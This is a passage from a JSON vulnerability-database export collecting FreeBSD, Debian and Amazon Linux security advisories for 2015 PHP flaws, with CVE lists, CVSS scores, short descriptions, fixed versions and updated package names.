tag byte value of 32 bytes).\n\nhash:\n\t \nFixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n\nPCRE:\n\t \nFixed bug #70345 (Multiple vulnerabilities related to PCRE functions).\n\nSOAP:\n\t \nFixed bug #70388 (SOAP serialize_function_call() type confusion / RCE).\n\nSPL:\n\t \nFixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage).\nFixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList).\n\nXSLT:\n\t \nFixed bug #69782 (NULL pointer dereference).\n\nZIP:\n\t \nFixed bug #70350 (ZipArchive::extractTo allows for directory traversal when creating directories).\n\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-03T00:00:00", "type": "freebsd", "title": "php -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-08T00:00:00", "id": "3D675519-5654-11E5-9AD8-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/3d675519-5654-11e5-9ad8-14dae9d210b8.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T22:45:00", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3358-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 13, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2015-6834 CVE-2015-6835 CVE-2015-6836 CVE-2015-6837 \n CVE-2015-6838\n\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. Please\nrefer to the upstream changelog for more information:\n\n https://php.net/ChangeLog-5.php#5.4.45\n https://php.net/ChangeLog-5.php#5.6.13\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.45-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-13T14:58:00", "type": "debian", "title": "[SECURITY] [DSA 3358-1] php5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-13T14:58:00", "id": "DEBIAN:DSA-3358-1:3BA72", "href": "https://lists.debian.org/debian-security-announce/2015/msg00257.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-29T01:05:39", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3358-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 13, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2015-6834 CVE-2015-6835 CVE-2015-6836 CVE-2015-6837 \n CVE-2015-6838\n\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. Please\nrefer to the upstream changelog for more information:\n\n https://php.net/ChangeLog-5.php#5.4.45\n https://php.net/ChangeLog-5.php#5.6.13\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.45-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-13T14:58:00", "type": "debian", "title": "[SECURITY] [DSA 3358-1] php5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-13T14:58:00", "id": "DEBIAN:DSA-3358-1:5263D", "href": "https://lists.debian.org/debian-security-announce/2015/msg00257.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-23T22:20:54", "description": "Package : php5\nVersion : 5.3.3.1-7+squeeze28\nCVE ID : CVE-2015-6831 CVE-2015-6832 CVE-2015-6833 CVE-2015-6834\n CVE-2015-6836 CVE-2015-6837 CVE-2015-6838 CVE-2015-7803\n CVE-2015-7804\n\n * CVE-2015-6831\n Use after free vulnerability was found in unserialize() function.\n We can create ZVAL and free it via Serializable::unserialize.\n However the unserialize() will still allow to use R: or r: to set\n references to that already freed memory. It is possible to\n use-after-free attack and execute arbitrary code remotely.\n * CVE-2015-6832\n Dangling pointer in the unserialization of ArrayObject items.\n * CVE-2015-6833\n Files extracted from archive may be placed outside of destination\n directory\n * CVE-2015-6834\n Use after free vulnerability was found in unserialize() function.\n We can create ZVAL and free it via Serializable::unserialize.\n However the unserialize() will still allow to use R: or r: to set\n references to that already freed memory. It is possible to\n use-after-free attack and execute arbitrary code remotely.\n * CVE-2015-6836\n A type confusion occurs within SOAP serialize_function_call due\n to an insufficient validation of the headers field.\n In the SoapClient's __call method, the verify_soap_headers_array\n check is applied only to headers retrieved from\n zend_parse_parameters; problem is that a few lines later,\n soap_headers could be updated or even replaced with values from\n the __default_headers object fields.\n * CVE-2015-6837\n The XSLTProcessor class misses a few checks on the input from the\n libxslt library. The valuePop() function call is able to return\n NULL pointer and php does not check that.\n * CVE-2015-6838\n The XSLTProcessor class misses a few checks on the input from the\n libxslt library. The valuePop() function call is able to return\n NULL pointer and php does not check that.\n * CVE-2015-7803\n A NULL pointer dereference flaw was found in the way PHP's Phar\n extension parsed Phar archives. A specially crafted archive could\n cause PHP to crash.\n * CVE-2015-7804\n An uninitialized pointer use flaw was found in the\n phar_make_dirstream() function of PHP's Phar extension.\n A specially crafted phar file in the ZIP format with a directory\n entry with a file name "/ZIP" could cause a PHP application\n function to crash.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-11-08T18:51:20", "type": "debian", "title": "[SECURITY] [DLA 341-1] php5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2015-11-08T18:51:20", "id": "DEBIAN:DLA-341-1:DA682", "href": "https://lists.debian.org/debian-lts-announce/2015/11/msg00002.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2021-07-25T19:28:39", "description": "**Issue Overview:**\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838)\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-6834, CVE-2015-6835, CVE-2015-6836)\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php54-xml-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-enchant-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-recode-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mysqlnd-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-tidy-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-bcmath-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mcrypt-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-cli-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-xmlrpc-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-dba-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-devel-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-intl-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pgsql-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mbstring-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-process-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-gd-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pdo-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-embedded-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mssql-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-soap-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-debuginfo-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mysql-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-snmp-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-fpm-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pspell-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-imap-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-odbc-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-ldap-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-common-5.4.45-1.75.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php54-5.4.45-1.75.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php54-debuginfo-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-recode-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-dba-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pspell-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-process-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-devel-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-enchant-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-imap-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-intl-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mssql-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mysql-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pdo-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-common-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mysqlnd-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mcrypt-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-snmp-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-xml-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-embedded-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-gd-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mbstring-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-tidy-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-bcmath-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-soap-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-odbc-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-ldap-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-fpm-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-cli-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pgsql-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-xmlrpc-5.4.45-1.75.amzn1.x86_64 \n \n \n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-16T16:30:00", "type": "amazon", "title": "Low: php54", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2016-03-16T16:30:00", "id": "ALAS-2016-670", "href": "https://alas.aws.amazon.com/ALAS-2016-670.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-27T19:37:07", "description": "**Issue Overview:**\n\nAs <a href=\"https://bugs.php.net/bug.php?id=69720\">reported upstream</a>, A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-6834, CVE-2015-6835, CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838)\n\nAs <a href=\"https://bugs.php.net/bug.php?id=70433\">reported upstream</a>, an uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name \"/ZIP\" could cause a PHP application function to crash. (CVE-2015-7804)\n\n \n**Affected Packages:** \n\n\nphp56\n\n \n**Issue Correction:** \nRun _yum update php56_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php56-xmlrpc-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-xml-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-odbc-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-imap-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-pdo-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-debuginfo-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-gmp-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mcrypt-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-dba-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-tidy-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-enchant-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-opcache-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-common-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-devel-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-fpm-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mssql-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-pspell-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-snmp-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-process-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-cli-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mysqlnd-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-ldap-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-gd-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-intl-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-embedded-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-dbg-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-bcmath-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-soap-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-pgsql-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-recode-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mbstring-5.6.14-1.119.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php56-5.6.14-1.119.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php56-intl-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-process-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-xml-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-common-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-xmlrpc-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-recode-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-snmp-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-ldap-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-debuginfo-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mssql-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mysqlnd-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-soap-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mcrypt-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-enchant-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-devel-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-pgsql-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-dbg-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-opcache-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-cli-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-embedded-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-tidy-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mbstring-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-gd-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-bcmath-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-pdo-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-gmp-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-imap-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-fpm-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-odbc-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-pspell-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-dba-5.6.14-1.119.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-20T14:50:00", "type": "amazon", "title": "Medium: php56", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2016-03-16T16:30:00", "id": "ALAS-2015-601", "href": "https://alas.aws.amazon.com/ALAS-2015-601.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-27T19:37:06", "description": "**Issue Overview:**\n\nAs <a href=\"https://bugs.php.net/bug.php?id=69720\">reported upstream</a>, A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-6834, CVE-2015-6835, CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838)\n\nAs <a href=\"https://bugs.php.net/bug.php?id=70433\">reported upstream</a>, an uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name \"/ZIP\" could cause a PHP application function to crash. (CVE-2015-7804)\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php55-embedded-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-bcmath-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-snmp-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-cli-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mbstring-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-ldap-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pgsql-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pdo-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pspell-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-dba-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-common-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-odbc-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-enchant-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-xml-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-soap-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-fpm-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-gmp-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-xmlrpc-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-opcache-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-process-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-debuginfo-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mcrypt-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 